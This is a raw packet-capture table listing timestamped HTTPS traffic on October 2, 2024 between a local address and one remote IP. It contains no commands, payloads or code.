Oct 2, 2024 05:30:42.078841925 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.078994036 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.079687119 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.079704046 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.079761982 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.079782009 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.079819918 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.096939087 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.096966028 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.097064972 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.097100973 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.097265005 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.097848892 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.097871065 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.097934008 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.097943068 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.097982883 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.114748001 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.114777088 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.114948988 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.115029097 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.115202904 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.115863085 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.115880966 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.115962029 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.115978003 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.116080046 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.145226955 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.145256042 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.145492077 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.145523071 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.145580053 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.146317005 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.146338940 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.146399975 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.146421909 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.146456957 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.146476984 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.165075064 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.165098906 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.165167093 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.165199995 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.165241003 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.166207075 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.166223049 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.166275978 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.166290998 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.166328907 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.183810949 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.183834076 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.183974028 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.184009075 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.184171915 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.184797049 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.184818029 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.184885979 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.184894085 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.184942007 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.202100992 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.202130079 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.202193975 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.202225924 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.202280045 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.202280045 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.282155991 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.282181978 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.282349110 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.282423019 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.282497883 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.283005953 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.283021927 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.283094883 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.283111095 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.283173084 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.283173084 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.284521103 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.284543991 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.284621954 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.284636974 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.284698009 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.285449982 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.285468102 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.285531044 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.285547018 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.285603046 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.286159039 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.286175013 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.286231041 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.286245108 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.286309004 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.288017988 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.288038969 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.288083076 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.288096905 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.288141966 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.288161039 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.288971901 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.288999081 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.289062977 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.289077997 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.289133072 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.289674044 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.289689064 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.289740086 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.289755106 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.289802074 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.300829887 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.300852060 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.300920963 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.300940037 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.301163912 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.301165104 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.377083063 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.377154112 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.377391100 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.377391100 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.377425909 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.377482891 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.378351927 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.378406048 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.378447056 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.378467083 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.378489017 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.378520966 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.379576921 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.379626036 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.379654884 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.379669905 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.379688025 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.379717112 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.380340099 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.380389929 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.380405903 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.380414963 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.380440950 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.380460024 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.381320000 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.381370068 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.381397963 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.381411076 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.381428957 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.381454945 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.382275105 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.382324934 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.382359982 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.382379055 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.382395029 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.382415056 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.383259058 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.383302927 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.383326054 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.383337021 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.383358955 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.383377075 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.388000011 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.388027906 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.388098001 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.388115883 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.388155937 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.463685036 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.463742971 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.463814974 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.463845015 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.463867903 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.463892937 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.464622974 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.464665890 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.464699984 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.464710951 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.464735985 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.464754105 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.466092110 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.466130018 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.466176033 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.466186047 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.466212034 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.466228962 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.466985941 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.467001915 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.467072964 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.467080116 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.467128992 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.467830896 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.467858076 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.467922926 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.467932940 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.467976093 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.486738920 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.486768007 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.486861944 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.486880064 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.486924887 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.487735033 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.487752914 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.487807035 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.487814903 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.487854958 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.488749981 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.488768101 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.488835096 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.488842964 CEST  443          49730      207.241.227.240  192.168.2.4
                                                          Oct 2, 2024 05:30:42.488893986 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.550468922 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.550502062 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.550781012 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.550816059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.550874949 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.551446915 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.551464081 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.551526070 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.551534891 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.551585913 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.554565907 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.554585934 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.554687977 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.554699898 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.554758072 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.555507898 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.555525064 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.555603981 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.555613995 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.555659056 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.556372881 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.556387901 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.556451082 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.556463003 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.556503057 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.573648930 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.573673964 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.573754072 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.573779106 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.573822975 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.574166059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.574182034 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.574237108 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.574244976 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.574285030 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.622225046 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.622251034 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.622395039 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.622436047 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.622586012 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.637079954 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.637104988 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.637187004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.637228966 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.637274981 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.638050079 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.638063908 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.638120890 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.638130903 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.638179064 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.641266108 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.641283035 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.641346931 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.641360998 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.641400099 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.642225981 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.642246008 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.642313004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.642323017 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.642359972 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.665816069 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.665838957 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.665961027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.665996075 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.666043997 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.759675980 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.759730101 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.759913921 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.759913921 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.759958982 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.760019064 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.760966063 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.761009932 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.761035919 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.761045933 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.761068106 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.761087894 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.761982918 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762022018 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762053013 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762059927 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762075901 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762095928 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762897015 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762933969 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.762968063 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.762974024 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.763021946 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.763920069 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.763958931 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.763989925 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.763998032 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764009953 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.764038086 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.764898062 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764931917 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764975071 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.764982939 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.764997005 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.765021086 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.765841961 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.765861988 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.765911102 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.765921116 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.765954971 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.766531944 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.766546965 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.766593933 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.766604900 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.766644955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.846174955 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.846230984 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.846349001 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.846405983 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.846426010 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.846453905 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.847253084 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.847287893 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.847321033 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.847347021 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.847368956 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.847392082 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848073006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848110914 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848140955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848153114 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848175049 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848193884 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:42.848840952 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848871946 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:42.848902941 CEST49730443192.168.2.4207.241.227.240
